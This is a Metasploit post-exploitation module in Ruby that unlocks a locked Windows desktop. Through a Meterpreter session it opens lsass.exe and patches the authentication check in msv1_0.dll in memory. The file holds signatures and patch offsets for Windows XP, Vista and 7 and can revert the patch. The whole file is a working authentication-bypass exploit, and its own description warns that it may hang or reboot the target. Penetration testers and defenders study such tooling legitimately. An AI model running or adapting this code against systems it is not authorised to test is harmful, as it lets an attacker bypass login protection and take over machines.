metasploit-framework/modules/post/windows/escalate/screen_unlock.rb

109 lines
3.8 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'metasm'
class Metasploit3 < Msf::Post
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Escalate Locked Desktop Unlocker',
'Description' => %q{
This module unlocks a locked Windows desktop by patching
the respective code inside the LSASS.exe process. This
patching process can result in the target system hanging or
even rebooting, so be careful when using this module on
production systems.
},
'License' => MSF_LICENSE,
'Author' =>
[
'L4teral <l4teral[4t]gmail com>', # Meterpreter script
'Metlstorm' # Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16
],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ],
'References' =>
[
[ 'URL', 'http://www.storm.net.nz/projects/16' ]
]
))
register_options([
OptBool.new('REVERT', [false, "Enable this option to revert the in-memory patch and enable locking again", false])
], self.class)
end
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
def run
revert = datastore['REVERT']
targets = [
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x9927, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x99cc, :os => /Windows XP.*Service Pack 2/ },
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x981b, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x98c0, :os => /Windows XP.*Service Pack 3/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
]
unsupported if client.platform !~ /win32|win64/i
os = client.sys.config.sysinfo['OS']
targets.each do |t|
if os =~ t[:os]
target = t
print_status("OS '#{os}' found in known targets")
pid = client.sys.process["lsass.exe"]
p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
dllbase = p.image["msv1_0.dll"]
sig = p.memory.read(dllbase + target[:sigoffset], target[:sig].length / 2).unpack("H*")[0]
if sig != target[:sig]
print_error("Found signature does not match")
next
end
old_code = p.memory.read(dllbase + target[:patchoffset], target[:orig_code].length / 2).unpack("H*")[0]
if !((old_code == target[:orig_code] && !revert) || (old_code == target[:patch] && revert))
print_error("Found code does not match")
next
end
print_status("Patching...")
new_code = revert ? target[:orig_code] : target[:patch]
p.memory.write(dllbase + target[:patchoffset], [new_code].pack("H*"))
written_code = p.memory.read(dllbase + target[:patchoffset], target[:patch].length / 2).unpack("H*")[0]
if ((written_code == target[:patch] && !revert) || (written_code == target[:orig_code] && revert))
print_status("Done!")
raise Rex::Script::Completed
else
print_error("Failed!")
next
end
end
end
print_error("No working target found")
end
end